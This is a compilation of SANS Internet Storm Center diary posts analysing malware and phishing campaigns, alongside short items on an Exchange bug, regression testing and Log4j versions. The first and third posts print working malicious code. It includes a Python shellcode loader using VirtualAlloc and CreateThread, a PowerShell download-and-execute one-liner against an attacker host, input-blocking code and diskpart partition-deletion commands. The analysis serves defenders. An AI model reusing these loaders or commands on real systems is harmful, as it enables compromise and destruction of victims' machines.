This week I found a lot of interesting scripts as this is my fourth diary in a row! I spotted a Python script that targets Chinese people. The script has a very low VT score (2/56) (SHA256:aaec7f4829445c89237694a654a731ee5a52fae9486b1d2bce5767d1ec30c7fb). How attackers can restricts their surface attack to some regions, countries or people?

The script implements a simple direct API call using the ctypes library:

dll_h = ctypes.windll.kernel32
if (dll_h.GetSystemDefaultUILanguage() != 2052):
    print(1)
    #exit(0)

GetSystemDefaultUILanguage() is a Microsoft API call that returns the system default UI language of the operating system[1]. If the language code is not 2052, the script exits. The valid 2052 correspond to "Simplified Chinese"[2]. Note that the script uploaded to VT was probably still being debugged or developed because exit() has been commented.

I had a look at the script which decoded a shell code using a Base85 encoding:

global c
url = 'hxxp://fileserverhk[.]oss-cn-hongkong[.]aliyuncs[.]com/home/js/js.js'
req = urllib.request.Request(url)
data = urllib.request.urlopen(req).read()
key0 = data[:1]
key1 = data[-5:]
key2 = data[1:len(data)-5]
c = b''.fromhex(key2.replace(key1,key0).decode())
c = base64.b85decode(c)

The shellcode downloads the next stage:

Loaded 348 bytes from file C:UsersREMDesktopc.bin
Initialization Complete..
Max Steps: 2000000
Using base offset: 0x401000

4010a2  LoadLibraryA(wininet)
4010b5  InternetOpenA()
4010d1  InternetConnectA(server: adult[.]up-flash[.]com, port: 8443, )

The shellcode is injected using an Base16/Hex/Base85 encoded code:

def decrypt_eval(str):
    global c
    s1 = base64.b16decode(str.encode()).decode()
    s2 = b''.fromhex(s1)
    s3 = base64.b85decode(s2)
    exec(s3.decode())

The decoded code is classic:

import ctypes;
wiseZERld = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(c)),ctypes.c_int(0x3000),ctypes.c_int(0x40));
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(wiseZERld), c, ctypes.c_int(len(c)));
x = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(wiseZERld),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)));
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(x),ctypes.c_int(-1));

You can find more information in the shellcode to generate the complete URL. The URI is readable and a User-Agent. It must be provided to fetch the content otherwise, an error is returned:

curl -o payload.bin -A "Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; RM-1152) AppleWebKit/537.36 (KHTML, like Gecko)" https://adult.up-flash.com:8443/files/ch.jpg

The payload seems encrypted  but I did not find a way to decode it yet. When the payload is executed in a sandbox, it tries to fetch the following URL but a 404 error is returned:

https://adult.up-flash.com:8443/r_config/

There is another behaviour in the Python script and I don't see the purpose of this. Web services are created and binded to the loopback on multiple high-ports:

self.ports = [45990, 44792, 56390, 31590, 32790, 48790, 13080, 25980, 34680, 47980, 51380, 61080]

The webserver just returns a string "c_online_s":

  def handler(self, port):
        ip_port = ('127.0.0.1', port)
        back_log = 10
        buffer_size = 1024
        webserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        webserver.bind(ip_port)
        webserver.listen(back_log)
        while True:
            try:
                conn, addr = webserver.accept()
                if port in self.ports:
                    self.init = True
                recvdata = conn.recv(buffer_size)
                conn.sendall(bytes("HTTP/1.1 200 OKrnAccess-Control-Allow-Origin: *rnrn", "utf-8"))
                conn.sendall(bytes("c_online_s", "utf-8"))
                conn.close()
            except:
                pass

I've no idea about the purpose of this. If you have suggestions, please share!

[1] https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-getsystemdefaultuilanguage
[2] https://www.autoitscript.com/autoit3/docs/appendix/OSLangCodes.htm

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Code re-use is classic behavior for many developers and this looks legit: Why reinvent the wheel if you can find some pieces of code that do what you are trying to achieve? If you publish a nice piece of code on platforms like GitHub, there are chances that your project will be used and sometimes forked by other developers who will add features, fix issues, etc. That's the magic of the Internet. But attackers are also looking for interesting code to borrow on GitHub. A few weeks ago, I wrote a diary about Excel Add-In's[1] used to distribute malware.

This morning,I spotted another campaign that uses the same technique. Emails are sent to victims asking them to have a look at important documents. The payload is delivered in a ZIP archive "Attachments.zip". The archive contains two XLL files:

remnux@remnux:/MalwareZoo/20220105$ unzip -t Attachments.zip 
Archive:  Attachments.zip
    testing: Proposal Listing.xll     OK
    testing: Proposal Listing continue.xll   OK
No errors detected in compressed data of Attachments.zip.

Both files are indeed Excel Add-In both for different architectures:

remnux@remnux:/MalwareZoo/20220105$ file Proposal Listing*
Proposal Listing continue.xll: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Proposal Listing.xll:          PE32+ executable (DLL) (GUI) x86-64, for MS Windows

These XLL files are interesting because they are based on a project called ExcelDNA:

remnux@remnux:/MalwareZoo/20220105$ pedump Proposal Listing continue.xll |tail -28
=== VERSION INFO ===

# VS_FIXEDFILEINFO:
  FileVersion         :  1.1.0.3
  ProductVersion      :  1.1.0.3
  StrucVersion        :  0x10000
  FileFlagsMask       :  0x17
  FileFlags           :  0
  FileOS              :  4
  FileType            :  2
  FileSubtype         :  0

# StringTable 080004b0:
  Comments            :  "Unmanaged loader shim for Excel-DNA Add-Ins"
  CompanyName         :  "Govert van Drimmelen"
  FileDescription     :  "Excel-DNA Dynamic Link Library"
  FileVersion         :  "1.1.0.3"
  InternalName        :  "ExcelDna"
  LegalCopyright      :  "Copyright (C) 2005-2020 Govert van Drimmelen"
  OriginalFilename    :  "ExcelDna.xll"
  ProductName         :  "Excel-DNA Add-In Framework for Microsoft Excel"
  ProductVersion      :  "1.1"

  VarFileInfo         :  [ 0x800, 0x4b0 ]

=== Packer / Compiler ===

  MS Visual C++ 6.0 - 8.0

Searching for "Govert van Drimmelen" will redirect you to a GitHub project[2]. And to confirm the code re-use, we can search for code similarities:

97% of the code is common with the ExcelDna sample Add-In! (Source: Intezer Analyze). The dropped malware is an info stealer. Malware families sometimes share a lot of "bad" code but malware developers are also looking for interesting "safe" code!

[1] https://isc.sans.edu/forums/diary/Downloader+Disguised+as+Excel+AddIn+XLL/28052
[2] https://github.com/govert/ExcelDna

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

I found another script that performs malicious actions. It’s a simple batch file (.bat) that is not obfuscated but it has a very low VT score (1/53). The file hash is cc8ae359b629bc40ec6151ddffae21ec8cbfbcf7ca7bda9b3d9687ca05b1d584. The file is detected by only one antivirus that triggered on the “shutdown.exe” located at the end of the script! Why is this script annoying people? Because it uses the BlockInput() API call through a PowerShell one-liner:

powershell -exec bypass -w h -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('hxxps://phoenixthrush[.]com/payloads/scripts/disabling_user_input/disable_user_input.ps1')|iex"

IWR is the abbreviated PowerShell command Invoke-WebRequest (like IEX and Invoke-Expression)

Here is the PowerShell code downloaded and executed:

# requires Administrator
$code = @'
  [DllImport("user32.dll")]
  public static extern bool BlockInput(bool fBlockIt);
'@

$userInput = Add-Type -MemberDefinition $code -Name Blocker -Namespace UserInput -PassThru

# block user input
$null = $userInput::BlockInput($true)

If you don’t know what is the purpose of the BlockInput() API call[1]. The function expects one parameter: TRUE or FALSE. When TRUE is passed, it blocks keyboard and mouse input events from reaching applications. From the user’s point of view, it means that no interaction is possible with the computer until the API is called a second time with “FALSE”. This API is provided by Microsoft to prevent the user to perform actions when the computer executes sensitive operations.

Tip: most people don’t know but there is a way to “unlock” the computer: Just press Ctrl-Alt-Delete then select "Cancel".

The next one-liner used reconfigures the way the power button works:

powershell -exec bypass -w h -c "powercfg -setacvalueindex scheme_balanced sub_buttons pbuttonaction 0"

powercfg.exe is a standard tool provided by Microsoft[2] that allows interaction with power schemes.

Then, the script drops two scripts on the target:

set WshShell = wscript.createobject("WScript.shell")
WshShell.run """C:WindowsTempx.bat"" ", 0, true

The file x.bat is a long script that destroys the victim's computer. Here are some pieces of code:

:: deleting some Windows partitions
echo Select Disk 0 >> y.txt
echo Select Partition 2 >> y.txt
echo Delete Partition Override >> y.txt
echo Select Partition 4 >> y.txt
echo Delete Partition Override >> y.txt
diskpart /s y.txt  >nul

Or:

:: creating a message box
echo msgbox"stupid b*tch",0 , "get rekt, ur PC has been f*cked" >> y.vbs

That's the first time that I see a call to BlockInput() in a batch file. This is a common anti-debugging technique implemented by malware to prevent the Analyst to interact with the debugger.

[1] https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-blockinput
[2] https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

I spotted this interesting phishing campaign that (ab)uses the McAfee antivirus to make people scared. It starts with a classic email that notifies the targeted user that a McAfee subscription expired:

The mail is not very well designed but it attracts the victim because it uses classic social engineering techniques:

• The fear: there is an issue with the antivirus product
• The interest: a huge discount is offered (80%)
• The pressure: this is a limited offer in time (only today). Note that the phisher did not change the discount expiration date (March 14, 2021).

When the victim clicks on the "Buy now" link, the following URL is reached: 

hxxps://r-trk[.]loumous[.]com/ga/click/2-51298608-3418-77390-152728-118643-69c53876cd-1807191af3

This website simulated an antivirus scan and, of course, the computer is infected by multiple malware! If the email is very simple, the fake scan is pretty well designed. I recorded a quick video to show it to you[1]:

I was late to get access to the next stage, it was already removed. We can presume that the attackers were trying to collect credentials and/or billing details.

[1] https://www.youtube.com/watch?v=44XAIh2ri54

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Another issue affecting onPrem Exchange servers (bug affect 2016 & 2019) has been made public today where emails are trapped in the transport queues, this is related to a date check failure with the change of the new year. Microsoft has confirmed this is not a security related issue.

Microsoft is working on a patch and has released a workaround posted here.

[1] https://techcommunity.microsoft.com/t5/exchange-team-blog/email-stuck-in-transport-queues/ba-p/3049447
[2] https://social.technet.microsoft.com/Forums/exchange/en-US/136b0705-6326-42c0-bff0-a6412fc84fb2/message-deferred-by-categorizer?forum=exchangesvrsecuremessaging
———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Last year, my professional relationship with computers entered its 30th year (in other words: for 30 years now, I'm getting paid to work with computers).

One of the things I learned over this period is: "in IT, expect regression".

With regression, I mean this definition: "the process of going back to an earlier or less advanced form or state".

I've seen this happen several times with IT security systems.

For example, a proxy that is configured to block certain web site categories, no longer blocks these web sites, but grants access. It happens for various reasons, but typically, it will happen when a configuration change is made. For example, a new category is supposed to be blocked, but this new catagory is added to an onbsolete configuration file, that is then pushed to the proxies. Result: previous categories that were blocked, are no longer blocked.

Another example: a firewall that is supposed to block all egress traffic, except for typical web traffic ports like 80, 443, …, no longer drops this traffic. This too happened with a configuration change, this time under the assumption that the egress blocking would be done by another network device.

What is typical about such regressions: you don't notice them immediately, and staff will not create helpdesk tickets for regressions that don't hinder them. If users are all of a sudden granted access to a web site that used to be blocked, they will not contact the helpdesk to report this …

Such regressions should be catched by proper release management, but in many cases that I observed, solid release management was in place at that organisation.

Over the years, this has thaught me one thing: "expect unannounced regressions to happen".

This has changed my behavior in 2 ways:

1) I strive to conduct regular regression tests: check that security policies that are supposed to be enforced, are still enforced

2) When performing incident response, when in doubt that a certain security policy is truly enforced, test it or gather evidence to the contrary.

Please post a comment if you have examples of unexpected regressions that you've seen happen during your job.

Best wishes for 2022 from all of us at the SANS Internet Storm Center!

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Since today is the last day of 2021, I decided to take a closer look at malware that got caught by my malspam trap over the course of the year.

Of the several hundred unique samples that were collected, probably the most interesting one turned out to be a fairly sizable .NET executable caught in October, which “weight in” at 300 MB and which has 26/64 detection rating on VT at the time of writing[1].

As you may see from the following image, the sample was obfuscated using multiple different tools.

The size of the file was, however, so significant not because of any complex obfuscation, but because the executable had a sizable null byte overlay (i.e., a large number of null bytes added after the end of the file).

Without the overlay, the file would have been less than 700 kB in size.

Although the use of null bytes to inflate the size of a malicious executable to the point when it will not be analyzed by anti-malware tools (AV tools on endpoints as well as on e-mail gateways/web gateways have set limit on the maximum size of files they can scan) is nothing new[2], as the fairly low VT score of this sample shows, it can still be quite effective. Especially when one considers that after further analysis, the executable turned out to be nothing more than a sample of Agent Tesla infostealer[3]…

Two other files I found in my “2021 collection” deserve a short mention in connection with the large executable described above.

They were, again, .NET PE files, and, again, were part of an Agent Tesla infection chain[4].

Besides this, however they were complete opposites of the sample mentioned before. They were only about 8 kB in size each, no obfuscation was used to protect them and their detections on VT are slightly/significantly higher (37/68[5] and 53/68[6] respectively). I mention them together because although there are slight differences in their code, as the following images show, both were very similar, and one can clearly see that they were only supposed to download and run additional code from the internet.

As the preceding text mentions, although all three samples were used in the infection chains of the same malware, the ability of anti-malware tools to detect them varies widely. And since the malware family in question is rather a common one and its samples are often spread by untargeted malspam messages, it goes to show (if anyone still needs to have that pointed out to them at the end of 2021) that depending only on traditional anti-malware tools for (not just) endpoint protection is simply not enough at this point in time…

Nevertheless, since I would like to end this post on a slightly more positive note, let me conclude by wishing you – on behalf of all of us at the SANS Internet Storm Center – a Happy New Year 2022, with as few malware (and other) infections and serious incidents as possible.

[1] https://www.virustotal.com/gui/file/3a4fc42fdb5a73034c00e4d709dad5641ca8ec64c0684fa5ce5138551dd3f47a/details
[2] https://isc.sans.edu/forums/diary/Picks+of+2019+malware+the+large+the+small+and+the+one+full+of+null+bytes/25718/
[3] https://tria.ge/211231-mfe4yafcfj
[4] https://tria.ge/210817-c7rr51256x
[5] https://www.virustotal.com/gui/file/f3ebbcbcaa7a173a3b7d90f035885d759f94803fef8f98484a33f5ecc431beb6
[6] https://www.virustotal.com/gui/file/12a978875dc90e03cbb76d024222abfdc8296ed675fca2e17ca6447ce7bf0080

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Introduction

Agent Tesla is a Windows-based keylogger and RAT that commonly uses SMTP or FTP to exfiltrate stolen data.  This malware has been around since 2014, and SMTP is its most common method for data exfiltration.

Earlier today, I reviewed post-infection traffic from a recent sample of Agent Tesla.  This activity revealed a change in Agent Tesla's SMTP data exfiltration technique.

Through November 2021 Agent Tesla samples sent their emails to compromised or possibly fraudulent email accounts on mail servers established through hosting providers.  Since December 2021, Agent Tesla now uses those compromised email accounts to send stolen data to Gmail addresses.

Shown above:  Flow chart of recent change in Agent Tesla SMTP data exfiltration.

SMTP exfiltration before the change

Agent Tesla is typically distributed through email, and the following sample was likely an attachment from malicious spam (malspam) sent on 2021-11-28.

SHA256 hash: bdae21952c4e6367fe534a9e5a3b3eb30d045dcb93129c6ce0435c3f0c8d90d3

• File size: 523,919 bytes
• File name: Purchase Order Pending Quantity.zip
• Earliest Contents Modification: 2021-11-28 19:55:50 UTC

SHA256 hash: aa4ea361f1f084b054f9871a9845c89d68cde259070ea286babeadc604d6658c

• File size: 557,056 bytes
• File name: Purchase Order Pending Quantity.exe
• Any.Run analysis from 2021-11-29: link

The packet capture (pcap) from Any.Run's analysis shows a typical SMTP data exfiltration path.  The infected Windows host sent a message with stolen data to an email address, and that address was on a mail server established through a hosting provider.

Shown above:  Traffic from the Any.Run analysis filtered in Wireshark.

Shown above:  TCP stream of SMTP traffic shows stolen data sent to the compromised email account.

Example after the change

The following Agent Tesla sample was likely an attachment from malspam sent on 2021-12-01.

SHA256 hash: 6f85cd9df964afc56bd2aed7af28cbc965ea56e49ce84d4f4e91f4478d378f94

• File size: 375,734 bytes
• File name: unknown
• Earliest Contents Modification: 2021-12-01 05:02:06 UTC

SHA256 hash: ff34c1fd26b699489cb814f93a2801ea4c32cc33faf30f32165b23425b0780c7

• File size: 537,397 bytes
• File name: Partial Shipment.exe
• Any.Run analysis from 2021-12-01: link

The pcap from Any.Run's analysis of this malware sample shows a new data exfiltration path.  The infected Windows host sent a message with stolen data to a Gmail address using a compromised email account from a mail server established through a hosting provider.

Shown above:  Traffic from the Any.Run analysis filtered in Wireshark.

Shown above:  TCP stream shows stolen data sent to Gmail address using the compromised email account.

Final words

The basic tactics of Agent Tesla have not changed.  However, post-infection traffic from samples since 2021-12-01 indicates Agent Tesla using STMP for data exfiltration now sends to Gmail addresses.  Based on the names of these addresses, I believe they are fraudulent Gmail accounts, or they were specifically established to receive data from Agent Tesla.

—

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

As Apache Log4j 2 security vulnerabilities continue to surface, and are quickly addressed by the Log4j Security Team, keeping track of specific CVEs, severity, and affected versions can be a bit of a task on the fly. As such, herein is a quick table version of update guidance. The current supported version of Log4j2 for Java 8 is 2.17.1 as of this writing.

Note: Log4j 1 is end of life and no longer supported. Java 7 and 6 are end of life and no longer supported. Please upgrade to current, supported versions accordingly.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.